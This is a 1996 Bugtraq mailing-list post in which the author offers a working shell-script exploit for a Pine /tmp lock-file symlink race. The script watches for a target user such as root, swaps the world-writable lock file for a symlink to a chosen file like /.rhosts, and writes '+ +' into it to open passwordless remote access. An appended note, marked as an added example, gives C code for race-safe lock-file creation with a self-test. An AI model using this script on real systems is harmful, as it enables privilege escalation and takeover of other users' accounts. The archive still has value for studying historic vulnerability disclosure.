Bugtraq mailing list archives
A Stupid script.
From: e-torres () uniandes edu co (Efrain Torres)
Date: Sat, 23 Nov 1996 10:36:57 +0500
H0l4,

Well, here is a stupid script to exploit the pine bug; it is better than having to exploit it manually. It just sucks waiting for the user to quit and re-enter pine.

Why is it a shell script and not a C program?.. Simple: because some roots don't allow the execution of cc, gcc (it's a security problem .. duhhhhhhh.... ).

So be happy whatever you do.

Greetings from Colombia,

E.T
Lownoise
e-torres () uniandes edu co

------------------------------------------------------------------------
^^ Funny Shit to know, some people like to spread ignorance to control the information, just to be the only ones. yeah in this country too.
L0wnoise
Just trying to change this shit. ^^
________________________________________________________________________

---------------------- Cut me here ---- YES! RIGHT HERE -------------
#!/bin/sh
#
# ET Lownoise 1996 Colombia
# pine bug exploit
#
# usage: pine.sh username path/file_to_create &
# ex: pine.sh root /.rhosts &
# ex2: pine.sh root /.rhosts > out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
# e-torres () uniandes edu co
#
argumentos=0
if [ $# -eq $argumentos ]
then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
fi
username=$1
archivo=$2
#CHANGE THIS:
#text='text to put in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command
text='+ +'
usr=users
pineprog=pine
#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0
until [ $entro -eq $entrada ]
do
    for nombre in `$usr`
    do
        if [ $nombre = $1 ]
        then
            entro=1
        fi
    done
done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "
noejecuto=0
ejecuto=0
until [ $ejecuto -ne $noejecuto ]
do
    for ejecutando in `w $username`
    do
        if [ $ejecutando = $pineprog ]
        then
            date
            echo '- OK ' $1 ' is running ' $pineprog '.'
            ejecuto=1
        fi
    done
done
echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo " quits $pineprog "
# do it till exist lockfile, that means username haven't quit pine
cd /tmp
while [ -s $lockfile ]
do
    sleep 0
done
cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
#$archivo is the complete path of file in username
cd /tmp
ln -s $archivo $lockfile
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo " $archivo "
echo "- Waiting $username to return pine "
noejecuto=0
ejecuto=0
until [ $ejecuto -ne $noejecuto ]
do
    for ejecutando in `w $username `
    do
        if [ $ejecutando = $pineprog ]
        then
            date
            echo '- OK ' $username ' is running ' $pineprog
            ejecuto=1
        fi
    done
done
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"
echo "ET Lownoise 1996 "
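The script in the message above depends on a program creating a world-writable lock file at a predictable /tmp name through whatever is already there, including a symlink. As an added example (not part of the original post and not Pine's actual fix), this is a generic hardened lock-file creation in C that refuses a pre-planted link; the function names and scratch paths are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a lock file without following a pre-planted symlink.
 * Returns an open fd, or -1 on refusal or error. */
int safe_lock_create(const char *path)
{
    struct stat st;
    /* O_EXCL fails if the name exists at all, even as a dangling symlink;
     * O_NOFOLLOW refuses a symlink in the last component; mode is 0600. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    /* Verify what was actually opened: regular file, ours, one link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demo in a private scratch directory. Returns 1 when the planted
 * link is refused, its target is never created, and a clean name gives 0600. */
int demo_planted_symlink(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", lock[64], target[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(lock, sizeof lock, "%s/lock", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    int planted = symlink(target, lock) == 0;
    int refused = safe_lock_create(lock) < 0;
    int target_absent = lstat(target, &st) != 0;
    unlink(lock);                      /* remove the planted link */
    int fd = safe_lock_create(lock);   /* clean name: should succeed */
    int ok = fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 0777) == 0600;
    if (fd >= 0) close(fd);
    unlink(lock); rmdir(dir);
    return planted && refused && target_absent && ok;
}

int main(void)
{
    return demo_planted_symlink() == 1 ? 0 : 1;
}
```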